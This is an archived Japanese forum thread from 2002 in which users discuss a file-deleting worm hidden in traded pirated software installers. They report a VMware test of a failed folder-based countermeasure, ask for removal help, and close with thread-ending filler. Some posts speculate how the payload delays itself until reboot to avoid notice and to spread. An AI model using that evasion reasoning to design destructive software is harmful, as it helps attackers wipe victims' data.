⊂(●ー●)⊂■ ■つつ         (´⌒(´⌒(´´
 ⊂、 、P  ■ ■│〜*  ≡≡≡(´⌒;;;≡≡≡
   ∀∀ ■ ■ / ンモーーーーーーーーッッッ  (´⌒(´⌒;;


937 :名無しさん@お腹いっぱい。:02/01/28 03:45
>>929
>その可能性も大いに考えられる。でもその時はなんとなく彼の言動に不信感を
>感じてしまったのは確か。

そのときは、ちゃんと何かと交換してあげたの?

938 : :02/01/28 03:48


939 :名無しさん@お腹いっぱい。:02/01/28 07:03
ワームの名前のフォルダを作るという対策ですけど、
実際にワームを持っている方、VirtualPC等で試していただけませんか?
その時にワームがどういう挙動を示すのかを。

940 :名無しさん@お腹いっぱい。:02/01/28 07:07
940

941 :929:02/01/28 09:50
>>937
>そのときは、ちゃんと何かと交換してあげたの?
WZエディタを持っていったような記憶があるけど、もう忘れた。

>>939
やってみた。VMwareだけど。
フルアクセスを不可にしたwinsvc.exeフォルダをc:\WINNT\System32
に配置した。で、セットアップと・・・
すると結果は俺の予想に反して、いきなり削除作業が開始した。
HDの激しいアクセス音と共に見る見るうちにファイルのアイコンが消えていった。
タスクマネージャを見ると、Setup.exeが稼動している。
で、Setup.exeタスクを切断。すると削除が止まる。

優れものだね、このワーム(ボム)


942 :名無しさん@お腹いっぱい。:02/01/28 10:06
>>941
>すると結果は俺の予想に反して、いきなり削除作業が開始した。

マジ?じゃあフォルダ作らないほうがいいんだね。

943 :929:02/01/28 10:23
>>942
そうだね。
ってか、考え様によっちゃ、インストール完了後、再起動したときにwinsvc.exeを
起動するよりもインストール開始と同時に破壊行為に及んだ方が手っ取り早いんだけど、
なんで、再起動後に稼動するようにしているんだろう?

そこのところの意図が読める人、厨房な俺に教えて。
ある程度の予想はできるが、「これだ!」というような理由が見つからん。

944 :名無しさん@お腹いっぱい。:02/01/28 10:48
>>943
よくわからんけど、一瞬安心させてそのあと突き落とす、ってことだけなんじゃないかな。
俺は前にやられたときは、インストールしたソフトを起動して喜んだ後に
再起動してやられたから、なんか虚しくなった記憶がある。

945 :名無しさん@お腹いっぱい。:02/01/28 10:50
それと、再起動したあとって、結構放っておく人が多いからかも。
実行直後だと、怪しいとおもってすぐに落とせてしまうし。

再起動かけた後、デスクトップが出るまでジーッと見てることはあんまり無いよね。



946 :ウィルスくらっただよ ◆NZPlYSK2 :02/01/28 11:00
madokaにひっかかってしまいました。

windows2000なんですが手動で削除しようとして
C:をmadoka.exeとozawa.exeで検索したんですが全然ひっかからないんです。
win.iniとsystem.iniも見てみたんですがrun=って項目が見当たらないようです。
windows2000は削除方法が違うんですか?


947 :929:02/01/28 13:20
俺の予想でも、>>945の理由がもっとも有力だね。

でも、後でレジストリをいじればキャンセルできるワームなんだし、ソフトも
利用できるんだから、本来の「不正にソフトを利用させない」といった理念からは
外れるんだよね。
それよか、「いきなり消去」の方がこの理念に合っていると思うし。
まぁ、結局のところ「不正にソフトを利用させない」よりも「奴のマシンを破壊する。うひ」
の理念の方が比重が重いからこういったワームを作ったのかな。
そう考えると、ソフトウェア会社がばら撒いたとは考えにくいんだよね。
結局、正義の味方気取りの厨房の仕業ってことか。

948 :名無しさん@お腹いっぱい。:02/01/28 15:50
どっちにしても犯罪なんだがな。

949 : :02/01/28 16:38
起動直後って常駐ソフトとかをロードするためにハードディスクに
さかんにアクセスしているから、それに紛れてファイルを大量に削除しても
ばれにくそう。ハードディスクのシーク音がソフトのロードのために
発生しているのか、ファイルを大量削除しているために発生しているのか
見分けにくい。

> ソフトウェア会社がばら撒いたとは考えにくいんだよね
というのは同意。


950 :名無しさん@お腹いっぱい。:02/01/28 18:19
>>944 >>955 の理由も思い当たるが、
本来単発のボムが「ワーム」としての機能を持つには、
ソフトウェアがあちこち流通する必要がある。
単にインストーラが破壊活動するだけなら、
インストール確認や起動確認する人からは再流通は望めない。

症状が後ほど出るっていうのは潜伏期間みたいなもので
その間に感染活動するのが一般的なウイルスのパターン。
普通のウイルスと違うのは、発病(潜伏期間終了)と感染活動が
人為的なもの(再起動と再流通)によること。


951 :名無しさん@お腹いっぱい。:02/01/28 18:50
インストーラを起動させただけで破壊活動するのは
著作権法違反以前の問題だから、被害届出しとけば。

普通は
インストーラ起動→使用許諾契約に合意→インストール開始
なわけだから、使用許諾契約に合意する前に破壊活動されたのなら
被害届出したところで自分が著作権法違反に問われることは
ないだろ。

952 : 1000!!!!!:02/01/28 18:53


953 : 1000!!!!!取り合戦開始!:02/01/28 18:53


954 :名無しさん@お腹いっぱい。:02/01/28 20:59
>>950
新スレきぼんぬ

955 : :02/01/29 17:37
嫌です。

956 :名無しさん@お腹いっぱい。:02/01/29 18:31
立てたよ
http://pc.2ch.net/test/read.cgi/sec/1012296560/l50

957 : 1000!!!!!取り合戦開始!:02/01/29 18:49


958 :名無しさん@お腹いっぱい。:02/01/29 22:59
http://www.google.co.jp/search?q=%95s%90%B3%90K&hl=ja&btnG=Google+%8C%9F%8D%F5&lr=

959 :名無しさん@お腹いっぱい。:02/01/30 10:15
まもなくここは 乂1000取り合戦場乂 となります。

      \∧_ヘ     / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
 ,,、,、,,, / \〇ノゝ∩ < 1000取り合戦、いくぞゴルァ!!       ,,、,、,,,
    /三√ ゚Д゚) /   \____________  ,,、,、,,,
     /三/| ゚U゚|\      ,,、,、,,,                       ,,、,、,,,
 ,,、,、,,, U (:::::::::::)  ,,、,、,,,         \オーーーーーーーッ!!/
      //三/|三|\     ∧_∧∧_∧ ∧_∧∧_∧∧_∧∧_∧
      ∪  ∪       (    )    (     )   (    )    )
 ,,、,、,,,       ,,、,、,,,  ∧_∧∧_∧∧_∧ ∧_∧∧_∧∧_∧∧_∧
      ,,、,、,,,       (    )    (    )    (    )    (    )

960 :名無しさん@お腹いっぱい。:02/01/30 15:15
 

961 :名無しさん@お腹いっぱい。:02/01/30 15:16
 


962 :名無しさん@お腹いっぱい。:02/01/30 15:16



963 :名無しさん@お腹いっぱい。:02/01/30 15:39
 

964 :名無しさん@お腹いっぱい。:02/01/30 15:39



965 :名無しさん@お腹いっぱい。:02/01/31 09:39
 

966 :名無しさん@お腹いっぱい。:02/01/31 09:39



967 :名無しさん@お腹いっぱい。:02/01/31 09:39
 


968 :名無しさん@お腹いっぱい。:02/01/31 09:39
968

969 :名無しさん@お腹いっぱい。:02/01/31 09:39
969


970 :1000:02/01/31 16:31
1000

971 : 1000!!!!!取り合戦開始!:02/01/31 16:52


972 :名無しさん@お腹いっぱい。:02/01/31 17:22
合戦停止

973 :名無しさん@お腹いっぱい。:02/01/31 18:27
 

974 :名無しさん@お腹いっぱい。:02/01/31 18:27



975 :名無しさん@お腹いっぱい。:02/01/31 18:27
 


976 :名無しさん@お腹いっぱい。:02/01/31 18:27
976

977 :名無しさん@お腹いっぱい。:02/01/31 18:27
977


978 :名無しさん@お腹いっぱい。:02/01/31 19:38
978

979 :名無しさん@お腹いっぱい。:02/01/31 19:39





980 :名無しさん@お腹いっぱい。:02/01/31 19:40



981 :名無しさん@お腹いっぱい。:02/01/31 19:42



256 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.02 2018/11/22 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)